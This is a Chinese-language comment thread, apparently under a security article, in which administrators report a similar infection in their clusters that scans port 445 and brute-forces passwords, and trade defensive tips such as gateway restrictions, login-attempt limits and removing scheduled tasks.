      亮了(3)

  • Meloncn  2019-07-06 回覆 3樓

     

    最近我們的集羣中也發現了這個東西

    亮了(0)

    • 竹林再遇北極熊  (1級) 安徽三實  2019-07-07 回覆

       

      “我們的集羣”說明不是運維就是甲方,成功需要千萬滴汗水組成,但是失敗只要一種因素,幸虧不是勒索,只是CPU高一點而已,不然領導公務再繁忙,眼裏也只裝的下事故兩個字。

      亮了(0)

  • 熱心市民王先生  (1級)  2019-07-06 回覆 4樓

     

    最近我們這邊集羣中也發現了這個東西,會掃描你的內網連接其他主機445端口,還會進行密碼爆破。(山東濰坊)

    亮了(0)

    • 竹林再遇北極熊  (1級) 安徽三實  2019-07-07 回覆

       

      單說一個掃描的話,有兩個地方需要注意,其中一個就是網關禁止,哪怕是超融合環境,虛擬化裏的也是有網關的,找到進行限制,不管是根據掃描特徵還是五元組都可以進行控制。其二就是服務器本地限制,因爲不跨網段不經過網關。另外服務器本地都可對登錄次數進行限制的。

      亮了(0)

  • 一個摸索安全的人  2019-07-08 回覆 5樓

     

    這個我們在甲方環境也發現了問題,主要是當時發現了定時任務,所以當時全局做了powershell的進程控制,然後再把計劃任務刪除掉,kill掉作者所述的這幾個進程,所以看到作者的覆盤讓我加深了印象,謝謝!

    亮了(0)

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章